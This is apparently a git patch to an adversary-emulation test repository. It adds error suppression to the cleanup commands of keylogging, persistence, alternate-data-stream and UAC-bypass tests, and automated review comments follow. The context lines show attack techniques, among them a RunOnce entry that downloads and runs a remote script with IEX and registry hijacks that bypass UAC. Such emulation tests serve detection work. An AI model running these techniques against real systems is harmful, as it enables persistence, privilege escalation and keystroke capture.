From 52b99cd65431b1bda6bc5345ce19deb99c16e5e9 Mon Sep 17 00:00:00 2001 From: tlor89 <60741301+tlor89@users.noreply.github.com> Date: Fri, 28 Feb 2020 13:47:42 -0600 Subject: [PATCH] T1056_T1090_CleanupErrors (#844) --- atomics/T1056/T1056.yaml | 2 +- atomics/T1060/T1060.yaml | 2 +- atomics/T1074/T1074.yaml | 2 +- atomics/T1084/T1084.yaml | 2 +- atomics/T1086/T1086.yaml | 2 +- atomics/T1088/T1088.yaml | 4 ++-- 6 files changed, 7 insertions(+), 7 deletions(-) diff --git a/atomics/T1056/T1056.yaml b/atomics/T1056/T1056.yaml index bf95a46e..2fcd2d96 100644 --- a/atomics/T1056/T1056.yaml +++ b/atomics/T1056/T1056.yaml @@ -22,4 +22,4 @@ atomic_tests: Set-Location $PathToAtomicsFolder .\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: | - Remove-Item $env:TEMP\key.log + Remove-Item $env:TEMP\key.log -ErrorAction Ignore diff --git a/atomics/T1060/T1060.yaml b/atomics/T1060/T1060.yaml index ea7fc8c5..3c740b16 100644 --- a/atomics/T1060/T1060.yaml +++ b/atomics/T1060/T1060.yaml @@ -53,4 +53,4 @@ atomic_tests: $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"' cleanup_command: | - Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force + Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force -ErrorAction Ignore diff --git a/atomics/T1074/T1074.yaml b/atomics/T1074/T1074.yaml index f91a7186..a5e34f3c 100644 --- a/atomics/T1074/T1074.yaml +++ b/atomics/T1074/T1074.yaml @@ -40,4 +40,4 @@ atomic_tests: command: | Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip cleanup_command: | - Remove-Item -Path $env:TEMP\Folder_to_zip.zip + Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction Ignore 
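Review bot: In atomics/T1056/T1056.yaml the cleanup still deletes the fixed path `$env:TEMP\key.log`, while the command line above it writes the log to `#{filepath}`. A run with a non-default `filepath` therefore leaves the captured keystrokes on disk, and with `-ErrorAction Ignore` that miss is now silent. Point the cleanup at the same argument: `Remove-Item #{filepath} -ErrorAction Ignore`. The default value of `filepath` is declared outside this hunk, so confirm whether it equals `$env:TEMP\key.log`.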
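Review bot: In atomics/T1060/T1060.yaml the cleanup depends on `$RunOnceKey`, which is assigned only inside the `command` block. If the cleanup runs in a separate PowerShell session (not visible from this hunk), the variable is empty, the removal cannot succeed, and the `NextRun` value stays under HKLM RunOnce as a live persistence entry. Make the cleanup self-contained by spelling out the key: `Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" -Name "NextRun" -Force -ErrorAction Ignore`.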
diff --git a/atomics/T1084/T1084.yaml b/atomics/T1084/T1084.yaml index 3786517a..f87cf9cd 100644 --- a/atomics/T1084/T1084.yaml +++ b/atomics/T1084/T1084.yaml @@ -40,7 +40,7 @@ atomic_tests: cleanup_command: | $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" - $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" + $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue $FilterConsumerBindingToCleanup | Remove-WmiObject $EventConsumerToCleanup | Remove-WmiObject diff --git a/atomics/T1086/T1086.yaml b/atomics/T1086/T1086.yaml index 4016baca..9cbc16f6 100644 --- a/atomics/T1086/T1086.yaml +++ b/atomics/T1086/T1086.yaml @@ -245,4 +245,4 @@ atomic_tests: $streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand' Invoke-Expression $streamcommand cleanup_command: | - Remove:Item #{ads_file} + Remove-Item #{ads_file} -Force -ErrorAction Ignore diff --git a/atomics/T1088/T1088.yaml b/atomics/T1088/T1088.yaml index a23156ba..29ed6ccb 100644 --- a/atomics/T1088/T1088.yaml +++ b/atomics/T1088/T1088.yaml @@ -44,7 +44,7 @@ atomic_tests: Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force Start-Process "C:\Windows\System32\eventvwr.msc" cleanup_command: | - Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse + Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore - name: Bypass UAC using Fodhelper description: | 
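Review bot: In atomics/T1084/T1084.yaml the `REFERENCES OF {...}` query is still issued with an empty `__RELPATH` when `$EventConsumerToCleanup` is null. `-ErrorAction SilentlyContinue` hides that error along with any genuine failure, such as insufficient rights, that would leave the filter-to-consumer binding registered. A guard is more precise than suppression: wrap the query line and the `$FilterConsumerBindingToCleanup | Remove-WmiObject` line in `if ($EventConsumerToCleanup) { }`. The `| Remove-WmiObject` pipelines that follow also receive `$null` in that case and are not covered by this change. This file uses `SilentlyContinue` while the other files in the commit use `Ignore`, and the cleanup block continues past the end of the hunk.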
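Review bot: In atomics/T1086/T1086.yaml `#{ads_file}` is substituted unquoted in the corrected cleanup line, and also in the `Get-Content -Path #{ads_file}` line above it. A path containing spaces would be split into several arguments, so the cleanup would fail or target the wrong path and leave the file carrying the `streamcommand` stream behind. Quote the argument: `Remove-Item "#{ads_file}" -Force -ErrorAction Ignore`. The argument's default value is declared outside this hunk.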
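Review bot: In atomics/T1088/T1088.yaml, `-ErrorAction Ignore` on the `Remove-Item "HKCU:\software\classes\mscfile"` cleanup discards every error, not only "key not found", and does not record it in `$Error`; the same applies to the `ms-settings` cleanup in the next hunk of this file. If the delete fails for any other reason, the `shell\open\command` default keeps pointing at `#{executable_binary}` and nothing reports it. Consider silencing only the missing-key case, e.g. `if (Test-Path "HKCU:\software\classes\mscfile") { Remove-Item "HKCU:\software\classes\mscfile" -Force -Recurse }`. Alternatively, `-ErrorAction SilentlyContinue` would keep the failure inspectable in `$Error`.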
@@ -115,7 +115,7 @@ atomic_tests: Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force Start-Process "C:\Windows\System32\ComputerDefaults.exe" cleanup_command: | - Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse + Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - name: Bypass UAC by Mocking Trusted Directories description: |